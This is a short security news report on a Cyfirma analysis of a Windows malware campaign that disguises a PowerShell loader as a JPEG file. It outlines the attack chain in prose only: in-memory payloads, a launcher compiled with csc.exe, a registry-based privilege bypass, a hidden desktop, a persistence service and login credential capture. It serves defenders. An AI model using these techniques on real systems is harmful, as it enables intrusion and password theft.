Cyfirma researchers identified a sophisticated cyberattack campaign targeting Windows systems using fake JPEG image files. The operation named Operation SilentCanvas tricks victims into running malicious PowerShell scripts disguised as harmless photos. However, attackers gain full and silent control of infected machines through the weaponized file.
The attack begins when victims receive what appears to be a routine image file called sysupdate.jpeg. Despite carrying a JPEG extension the file contains no actual image data whatsoever. Consequently, it holds a PowerShell script engineered to quietly set up staging environments and download malicious components.
The malware reconstructs dangerous command strings at runtime rather than writing them plainly in files to avoid detection. It also downloads a secondary payload named access.jpeg and runs it directly in memory. Furthermore, Microsoft’s own .NET compiler csc.exe builds a custom launcher named uds.exe on victim machines.
After the launcher runs the malware hijacks a registry key tied to the ms-settings protocol. The malware creates a hidden desktop environment operating outside the logged-in user’s view allowing undetected tool execution. Meanwhile, a persistent Windows service named OneDriveServers keeps the malware alive across reboots.
A separate component intercepts usernames and passwords at the Windows login screen before authentication occurs. Hidden local administrator accounts can be created for long-term access according to Cyfirma analysis. Security teams are advised to block or closely monitor execution of commonly abused Windows binaries including csc.exe and ComputerDefaults.exe.
